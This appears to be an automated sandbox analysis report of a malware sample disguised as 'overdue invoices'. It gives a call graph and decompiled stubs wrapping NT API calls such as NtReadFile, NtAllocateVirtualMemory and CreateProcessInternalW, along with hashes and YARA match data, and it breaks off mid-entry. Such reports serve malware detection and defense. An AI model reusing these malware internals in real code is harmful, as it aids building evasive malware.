27336 4191e0 LdrLoadDll 27335->27336 27337 40cfab 27336->27337 27337->26942 27338 418a50 27337->27338 27339 4191e0 LdrLoadDll 27338->27339 27340 418a6f LookupPrivilegeValueW 27339->27340 27340->26944 27342 4191e0 LdrLoadDll 27341->27342 27343 4184fc 27342->27343 27347 9d9910 LdrInitializeThunk 27343->27347 27344 41851b 27344->26945 27346->27333 27347->27344 27349 40a037 27348->27349 27350 409e90 LdrLoadDll 27349->27350 27351 40a066 27350->27351 27351->26869 27353 40d09a 27352->27353 27361 40d150 27352->27361 27354 409e90 LdrLoadDll 27353->27354 27355 40d0bc 27354->27355 27362 4181c0 27355->27362 27357 40d0fe 27365 418200 27357->27365 27360 418710 2 API calls 27360->27361 27361->26872 27361->26873 27363 4191e0 LdrLoadDll 27362->27363 27364 4181dc 27363->27364 27364->27357 27366 41821c 27365->27366 27367 4191e0 LdrLoadDll 27365->27367 27370 9d9fe0 LdrInitializeThunk 27366->27370 27367->27366 27368 40d144 27368->27360 27370->27368 27372 409ca1 27371->27372 27373 409c9d 27371->27373 27374 409cba 27372->27374 27375 409cec 27372->27375 27373->26883 27417 417f50 LdrLoadDll 27374->27417 27418 417f50 LdrLoadDll 27375->27418 27377 409cfd 27377->26883 27379 409cdc 27379->26883 27381 40d200 3 API calls 27380->27381 27382 4133c6 27381->27382 27382->26885 27419 407710 27383->27419 27386 407a0d 27386->26887 27387 407710 19 API calls 27388 4079fa 27387->27388 27388->27386 27437 40d470 27388->27437 27391 4191e0 LdrLoadDll 27390->27391 27392 41879c 27391->27392 27573 9d98f0 LdrInitializeThunk 27392->27573 27393 40a772 27395 40d200 27393->27395 27396 40d21d 27395->27396 27574 418240 27396->27574 27398 40d265 27398->26891 27400 418290 2 API calls 27401 40d28e 27400->27401 27401->26891 27403 4182ac 27402->27403 27404 4191e0 LdrLoadDll 27402->27404 27405 40a7d5 27403->27405 27580 9d9780 LdrInitializeThunk 27403->27580 27404->27403 27405->26897 27405->26900 27408 4191e0 LdrLoadDll 27407->27408 27409 4182fc 27408->27409 27581 9d97a0 LdrInitializeThunk 27409->27581 27410 40a8a9 27410->26908 27413 4191e0 LdrLoadDll 27412->27413 27414 4180bc 27413->27414 27582 9d9a20 LdrInitializeThunk 27414->27582 27415 40a8fc 27415->26912 27417->27379 27418->27377 27420 406e20 4 API calls 27419->27420 27423 40772a 27419->27423 27420->27423 27421 4079b9 27421->27386 27421->27387 27422 4079af 27424 4070e0 2 API calls 27422->27424 27423->27421 27423->27422 27427 418180 2 API calls 27423->27427 27429 40a910 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 27423->27429 27430 418710 LdrLoadDll NtClose 27423->27430 27435 4180a0 2 API calls 27423->27435 27445 417f90 27423->27445 27448 407540 27423->27448 27460 40d350 LdrLoadDll NtClose 27423->27460 27461 418010 LdrLoadDll 27423->27461 27462 418040 LdrLoadDll 27423->27462 27463 4180d0 LdrLoadDll 27423->27463 27464 407310 27423->27464 27480 405ea0 LdrLoadDll 27423->27480 27424->27421 27427->27423 27429->27423 27430->27423 27435->27423 27438 40d495 27437->27438 27439 407120 8 API calls 27438->27439 27440 40d4b9 27439->27440 27441 40d4c6 27440->27441 27442 413a50 8 API calls 27440->27442 27444 41a0a0 2 API calls 27440->27444 27561 40d2b0 27440->27561 27441->27386 27442->27440 27444->27440 27446 4191e0 LdrLoadDll 27445->27446 27447 417fac 27446->27447 27447->27423 27449 407556 27448->27449 27481 417b00 27449->27481 27451 40756f 27456 4076e1 27451->27456 27502 407120 27451->27502 27453 407655 27454 407310 11 API calls 27453->27454 27453->27456 27455 407683 27454->27455 27455->27456 27457 418180 2 API calls 27455->27457 27456->27423 27458 4076b8 27457->27458 27458->27456 27459 418780 2 API calls 27458->27459 27459->27456 27460->27423 27461->27423 27462->27423 27463->27423 27465 407339 27464->27465 27542 407280 27465->27542 27468 418780 2 API calls 27469 40734c 27468->27469 27469->27468 27470 4073d7 27469->27470 27472 4073d2 27469->27472 27550 40d3d0 27469->27550 27470->27423 27471 418710 2 API calls 27473 40740a 27471->27473 27472->27471 27473->27470 27474 417f90 LdrLoadDll 27473->27474 27475 40746f 27474->27475 27475->27470 27554 417fd0 LdrLoadDll 27475->27554 27477 4074d3 27477->27470 27478 413a50 8 API calls 27477->27478 27479 407528 27478->27479 27479->27423 27480->27423 27482 41a270 2 API calls 27481->27482 27483 417b17 27482->27483 27509 408160 27483->27509 27485 417b32 27486 417b70 27485->27486 27487 417b59 27485->27487 27490 41a020 2 API calls 27486->27490 27488 41a0a0 2 API calls 27487->27488 27489 417b66 27488->27489 27489->27451 27491 417baa 27490->27491 27492 41a020 2 API calls 27491->27492 27493 417bc3 27492->27493 27499 417e64 27493->27499 27515 41a060 27493->27515 27496 417e50 27497 41a0a0 2 API calls 27496->27497 27498 417e5a 27497->27498 27498->27451 27500 41a0a0 2 API calls 27499->27500 27501 417eb9 27500->27501 27501->27451 27503 40721f 27502->27503 27504 407135 27502->27504 27503->27453 27504->27503 27505 413a50 8 API calls 27504->27505 27506 4071a2 27505->27506 27507 41a0a0 2 API calls 27506->27507 27508 4071c9 27506->27508 27507->27508 27508->27453 27510 408185 27509->27510 27511 409b40 LdrLoadDll 27510->27511 27512 4081b8 27511->27512 27514 4081dd 27512->27514 27518 40b340 27512->27518 27514->27485 27536 418800 27515->27536 27519 40b36c 27518->27519 27520 418460 LdrLoadDll 27519->27520 27521 40b385 27520->27521 27522 40b38c 27521->27522 27529 4184a0 27521->27529 27522->27514 27526 40b3c7 27527 418710 2 API calls 27526->27527 27528 40b3ea 27527->27528 27528->27514 27530 4191e0 LdrLoadDll 27529->27530 27531 4184bc 27530->27531 27535 9d9710 LdrInitializeThunk 27531->27535 27532 40b3af 27532->27522 27534 418a90 LdrLoadDll 27532->27534 27534->27526 27535->27532 27537 4191e0 LdrLoadDll 27536->27537 27538 41881c 27537->27538 27541 9d9a00 LdrInitializeThunk 27538->27541 27539 417e49 27539->27496 27539->27499 27541->27539 27543 407298 27542->27543 27544 409b40 LdrLoadDll 27543->27544 27545 4072b3 27544->27545 27546 413e50 LdrLoadDll 27545->27546 27547 4072c3 27546->27547 27548 4072cc PostThreadMessageW 27547->27548 27549 4072e0 27547->27549 27548->27549 27549->27469 27551 40d3e3 27550->27551 27555 418110 27551->27555 27554->27477 27556 4191e0 LdrLoadDll 27555->27556 27557 41812c 27556->27557 27560 9d9840 LdrInitializeThunk 27557->27560 27558 40d40e 27558->27469 27560->27558 27562 40d2c1 27561->27562 27570 418960 27562->27570 27564 40d301 27565 40d308 27564->27565 27566 418180 2 API calls 27564->27566 27565->27440 27567 40d31f 27566->27567 27567->27565 27568 418780 2 API calls 27567->27568 27569 40d33e 27568->27569 27569->27440 27571 41897f CreateProcessInternalW 27570->27571 27572 4191e0 LdrLoadDll 27570->27572 27571->27564 27572->27571 27573->27393 27575 4191e0 LdrLoadDll 27574->27575 27576 41825c 27575->27576 27579 9d99a0 LdrInitializeThunk 27576->27579 27577 40d25e 27577->27398 27577->27400 27579->27577 27580->27405 27581->27410 27582->27415 27585 9d9540 LdrInitializeThunk

                  Executed Functions

                  Function 0041868B Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 0 41868b-4186d9 call 4191e0 NtReadFile
                  C-Code - Quality: 23%
                  			E0041868B(char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, char _a28, intOrPtr _a32, char _a36) {
				intOrPtr _v0;
				void* _t18;
				void* _t27;
				void* _t28;
				intOrPtr* _t29;
				void* _t31;

				asm("das");
				_t13 = _v0;
				_t29 = _v0 + 0xc48;
				E004191E0(_t27, _t13, _t29,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a36; // 0x413a31
				_t6 =  &_a28; // 0x413d72
				_t12 =  &_a4; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t29))( *_t12, _a8, _a12, _a16, _a20, _a24,  *_t6, _a32,  *_t4, _t28, _t31, 0x55ac4220); // executed
				return _t18;
			}









                  0x0041868b
                  0x00418693
                  0x0041869f
                  0x004186a7
                  0x004186ac
                  0x004186b2
                  0x004186cd
                  0x004186d5
                  0x004186d9

                  APIs
                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID: 1:A$r=A$r=A
                  • API String ID: 2738559852-4243674446
                  • Opcode ID: 849b43c23531ef391151ded7eead37fd9f4634d6bd74e75b25dfb1a80cf9624e
                  • Instruction ID: 845432d48f1b3e88d3377fba27ff230574edddf3e0b216b5d55ce1d301fb728a
                  • Opcode Fuzzy Hash: 849b43c23531ef391151ded7eead37fd9f4634d6bd74e75b25dfb1a80cf9624e
                  • Instruction Fuzzy Hash: 1AF0F4B2200108ABCB14DF99DC81EEB77ADEF8C354F058248FA1DA7241C630E951CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00418690 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 3 418690-4186a6 4 4186ac-4186d9 NtReadFile 3->4 5 4186a7 call 4191e0 3->5 5->4
                  C-Code - Quality: 37%
                  			E00418690(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191E0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a31
				_t6 =  &_a32; // 0x413d72
				_t12 =  &_a8; // 0x413d72
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                  0x00418693
                  0x0041869f
                  0x004186a7
                  0x004186ac
                  0x004186b2
                  0x004186cd
                  0x004186d5
                  0x004186d9

                  APIs
                  • NtReadFile.NTDLL(r=A,5E972F65,FFFFFFFF,?,?,?,r=A,?,1:A,FFFFFFFF,5E972F65,00413D72,?,00000000), ref: 004186D5
                  Strings
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileRead
                  • String ID: 1:A$r=A$r=A
                  • API String ID: 2738559852-4243674446
                  • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                  • Instruction ID: 4a498055f1de8b016eb86f05d4d9e2f0ef691a8d0c1c9b5c2f62b7bf89d1b75c
                  • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                  • Instruction Fuzzy Hash: D9F0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248FA0D97241CA30E851CBA0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004187BA Relevance: 1.6, APIs: 1, Instructions: 56memorynativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 295 4187ba-4187bd 296 41874b-418756 295->296 297 4187bf-4187d6 295->297 298 41875c-41877d 296->298 299 418757 call 4191e0 296->299 300 4187dc-4187fd NtAllocateVirtualMemory 297->300 301 4187d7 call 4191e0 297->301 299->298 301->300
                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: 99a3c799943dfdb52d4ed5e8e77ee2e2236ecf51025361dbfbbaa0aec4dafb26
                  • Instruction ID: c92a1b6b66be9103835d87d4b5c199b7011ad0bfcbd00854b47549e40392c302
                  • Opcode Fuzzy Hash: 99a3c799943dfdb52d4ed5e8e77ee2e2236ecf51025361dbfbbaa0aec4dafb26
                  • Instruction Fuzzy Hash: A8115BB2204209ABDB14DF89DC81EEB77ADEF8C354F158549FE1C97241C634E851CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 318 409b40-409b69 call 41af70 321 409b6b-409b6e 318->321 322 409b6f-409b7d call 41b390 318->322 325 409b8d-409b9e call 419720 322->325 326 409b7f-409b8a call 41b610 322->326 331 409ba0-409bb4 LdrLoadDll 325->331 332 409bb7-409bba 325->332 326->325 331->332
                  C-Code - Quality: 100%
                  			E00409B40(void* __ebx, void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				void* _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t31;
				void* _t32;
				void* _t33;

				_t25 = _a8;
				_v8 =  &_v536;
				_t15 = E0041AF70( &_v12, 0x104, _a8);
				_t32 = _t31 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B390(_v8, __ebx, _t25, _v8);
					_t33 = _t32 + 4;
					if(_t17 != 0) {
						E0041B610( &_v12, 0);
						_t33 = _t33 + 8;
					}
					_t18 = E00419720(_v8);
					_v16 = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                  0x00409b49
                  0x00409b5c
                  0x00409b5f
                  0x00409b64
                  0x00409b69
                  0x00409b73
                  0x00409b78
                  0x00409b7d
                  0x00409b85
                  0x00409b8a
                  0x00409b8a
                  0x00409b91
                  0x00409b99
                  0x00409b9e
                  0x00409bb2
                  0x00000000
                  0x00409bb4
                  0x00409bba
                  0x00409b6e
                  0x00409b6e
                  0x00409b6e

                  APIs
                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BB2
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: Load
                  • String ID:
                  • API String ID: 2234796835-0
                  • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                  • Instruction ID: 0a0fff248a1c50f77d94468520b7725d30d267451342bd90074e2a3d68e37629
                  • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                  • Instruction Fuzzy Hash: B50152B5D0010DB7DF10DAE1EC42FDEB378AB54318F0041A6E908A7281F634EB54C795
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004185E0 Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 336 4185e0-418631 call 4191e0 NtCreateFile
                  C-Code - Quality: 100%
                  			E004185E0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E004191E0(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                  0x004185ef
                  0x004185f7
                  0x0041862d
                  0x00418631

                  APIs
                  • NtCreateFile.NTDLL(00000060,00408B13,?,00413BB7,00408B13,FFFFFFFF,?,?,FFFFFFFF,00408B13,00413BB7,?,00408B13,00000060,00000000,00000000), ref: 0041862D
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: CreateFile
                  • String ID:
                  • API String ID: 823142352-0
                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                  • Instruction ID: 36c6eae92b8005ba539885d914b12f5379157c135ee825ad128bd076db7cd32f
                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                  • Instruction Fuzzy Hash: 24F0B2B2204208ABCB08CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004187C0 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 343 4187c0-4187fd call 4191e0 NtAllocateVirtualMemory
                  C-Code - Quality: 100%
                  			E004187C0(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E004191E0(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                  0x004187cf
                  0x004187d7
                  0x004187f9
                  0x004187fd

                  APIs
                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,004193B4,?,00000000,?,00003000,00000040,00000000,00000000,00408B13), ref: 004187F9
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: AllocateMemoryVirtual
                  • String ID:
                  • API String ID: 2167126740-0
                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                  • Instruction ID: 15e9253bdc6667238a85ff9da65bd6f3d3aad2e55959b4b07e7d113ae3ba9bea
                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                  • Instruction Fuzzy Hash: 6CF015B2200209ABDB14DF89CC81EEB77ADAF88754F118149FE0897241C630F910CBA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041870A Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 58%
                  			E0041870A(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				0x55c4();
				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                  0x0041870a
                  0x00418713
                  0x00418716
                  0x0041871f
                  0x00418727
                  0x00418735
                  0x00418739

                  APIs
                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 29ba20336e01ef3d8e74ba3aa10b17529f6adc3a74b4cfcfbca26a2c7b330e13
                  • Instruction ID: 9f0d72d98d7045acdb6c0f0ffcdcad9b54a730f68fea3cd66104d27a4ac48d12
                  • Opcode Fuzzy Hash: 29ba20336e01ef3d8e74ba3aa10b17529f6adc3a74b4cfcfbca26a2c7b330e13
                  • Instruction Fuzzy Hash: BAE0C271200200BFD710EBD4CC45ED73B68EF84360F144459FA186B282C530EA00C7E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00418710 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                  Download Yara Rule
                  C-Code - Quality: 100%
                  			E00418710(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x409763
				E004191E0(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                  0x00418713
                  0x00418716
                  0x0041871f
                  0x00418727
                  0x00418735
                  0x00418739

                  APIs
                  • NtClose.NTDLL(00413D50,?,?,00413D50,00408B13,FFFFFFFF), ref: 00418735
                  Memory Dump Source
                  • Source File: 00000001.00000002.442760136.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_400000_overdue invoices.jbxd
                  Yara matches
                  Similarity
                  • API ID: Close
                  • String ID:
                  • API String ID: 3535843008-0
                  • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                  • Instruction ID: bce2094732f0dc6043ed148681cd5d29f2b757d64a263796670ac5fc8daf7d12
                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                  • Instruction Fuzzy Hash: 27D01776200214BBE710EB99CC89EE77BACEF48760F154499FA189B242C930FA40C6E0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D98F0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 9929570f44b94a5997d94c455cd55dbca2e1f55d96bd6b0debba7ac687f089d6
                  • Instruction ID: 445facb986a2f520f51a8d74efbbc4a3b9cb1c1489090bb057fefebd8086fd0b
                  • Opcode Fuzzy Hash: 9929570f44b94a5997d94c455cd55dbca2e1f55d96bd6b0debba7ac687f089d6
                  • Instruction Fuzzy Hash: 7190026160214502D212715A4404626014A97D03C1FA1C032A5414555ECA658D92F171
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9840 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 3d03e9ea9d89475e12821bbfedc62d423a9587d05aaa510d4cc6cfd33e0a2d83
                  • Instruction ID: 6142828fcdb57620ab813f540c5815817b0339caa671401b538dc9b302161d2b
                  • Opcode Fuzzy Hash: 3d03e9ea9d89475e12821bbfedc62d423a9587d05aaa510d4cc6cfd33e0a2d83
                  • Instruction Fuzzy Hash: F6900261243181525656B15A44045174146A7E03C17A1C022A5804950C85669C56E661
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9860 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: a5c3c5fb83c340264e8a2749d409466b59757b8f865ffd1de783ca5882f8736c
                  • Instruction ID: cdab4a80da995d5d55f15801f27728e56c2a04b920f57b73aeaea20eda2c497b
                  • Opcode Fuzzy Hash: a5c3c5fb83c340264e8a2749d409466b59757b8f865ffd1de783ca5882f8736c
                  • Instruction Fuzzy Hash: BC90027120214413D222615A4504717014997D03C1FA1C422A4814558D96968D52F161
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D99A0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 7221d03adcf8fa9275e732511a6bdb18b367290d0653048d4b521d889f35cdb6
                  • Instruction ID: 11615873bd16ddf5dda828ff216455686b2802861c940ced4c426d165785dd76
                  • Opcode Fuzzy Hash: 7221d03adcf8fa9275e732511a6bdb18b367290d0653048d4b521d889f35cdb6
                  • Instruction Fuzzy Hash: AE9002A134214442D211615A4414B160145D7E1381F61C025E5454554D8659CC52B166
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D95D0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: f3c958d1af671782818f1459c7e96068da3c429b2d8af3a3c2efc5217cb11229
                  • Instruction ID: cd6353a9184fd0d4c1909e8806bc8c8d80c7d579205702b3020fbc3cb88a2165
                  • Opcode Fuzzy Hash: f3c958d1af671782818f1459c7e96068da3c429b2d8af3a3c2efc5217cb11229
                  • Instruction Fuzzy Hash: AA9002A1203140034216715A4414626414A97E0381B61C031E5404590DC5658C91B165
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9910 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: e46b9ef570646658698910fda7cc89bbcba169f30200da490d514e196f6a162e
                  • Instruction ID: b91703a6ea94d2ccbf01ee6136075539854d8a9d004294342047ad70726b1fcc
                  • Opcode Fuzzy Hash: e46b9ef570646658698910fda7cc89bbcba169f30200da490d514e196f6a162e
                  • Instruction Fuzzy Hash: 889002B120214402D251715A4404756014597D0381F61C021A9454554E86998DD5B6A5
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D9540 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID: InitializeThunk
                  • String ID:
                  • API String ID: 2994545307-0
                  • Opcode ID: 7494e54c30829b43bce3e5213e9ff2b6ad68b97625febf30887bfc18599e60a1
                  • Instruction ID: efa96e69cabf8cc8eaadea2d4bc88709414f1a357f3dbc1151df98fc36b81c83
                  • Opcode Fuzzy Hash: 7494e54c30829b43bce3e5213e9ff2b6ad68b97625febf30887bfc18599e60a1
                  • Instruction Fuzzy Hash: 0A900265212140030216A55A0704517018697D53D1361C031F5405550CD6618C61A161
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009D96E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
